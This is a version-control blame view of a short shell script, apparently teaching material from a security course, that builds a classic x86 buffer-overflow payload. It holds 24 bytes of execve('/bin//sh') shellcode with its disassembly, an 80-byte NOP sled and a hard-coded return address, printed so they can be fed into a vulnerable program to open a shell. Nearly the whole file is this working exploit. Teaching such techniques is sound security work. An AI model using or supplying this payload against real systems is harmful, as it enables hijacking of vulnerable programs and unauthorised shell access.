| author | Christian Urban <christian dot urban at kcl dot ac dot uk> | 
| Mon, 28 Sep 2015 00:16:15 +0100 | |
| changeset 387 | 03d5c3df745e | 
| parent 201 | f7a9837a63b8 | 
| child 400 | f05368d007dd | 
| permissions | -rwxr-xr-x | 
| 27 | 1 | #!/bin/sh | 
| 2 | ||
| 115 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 3 | # shellscript that overwrites the buffer with | 
| 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 4 | # some payload for opening a shell (the payload | 
| 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 5 | # cannot contain any \x00) | 
| 27 | 6 | |
| 7 | ||
| 8 | shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" | |
| 9 | ||
| 10 | # 24 bytes of shellcode | |
| 11 | ||
| 12 | # "\x31\xc0" // xorl %eax,%eax | |
| 13 | # "\x50" // pushl %eax | |
| 14 | # "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e | |
| 15 | # "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f | |
| 16 | # "\x89\xe3" // movl %esp,%ebx | |
| 17 | # "\x99" // cltd | |
| 18 | # "\x52" // pushl %edx | |
| 19 | # "\x53" // pushl %ebx | |
| 20 | # "\x89\xe1" // movl %esp,%ecx | |
| 21 | # "\xb0\x0b" // movb $0xb,%al | |
| 22 | # "\xcd\x80" // int $0x80 | |
| 23 | ||
| 24 | padding=`perl -e 'print "\x90" x 80'` | |
| 25 | ||
| 115 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 26 | # need s correct address in order to run | 
| 27 | 27 | printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" | 
| 28 |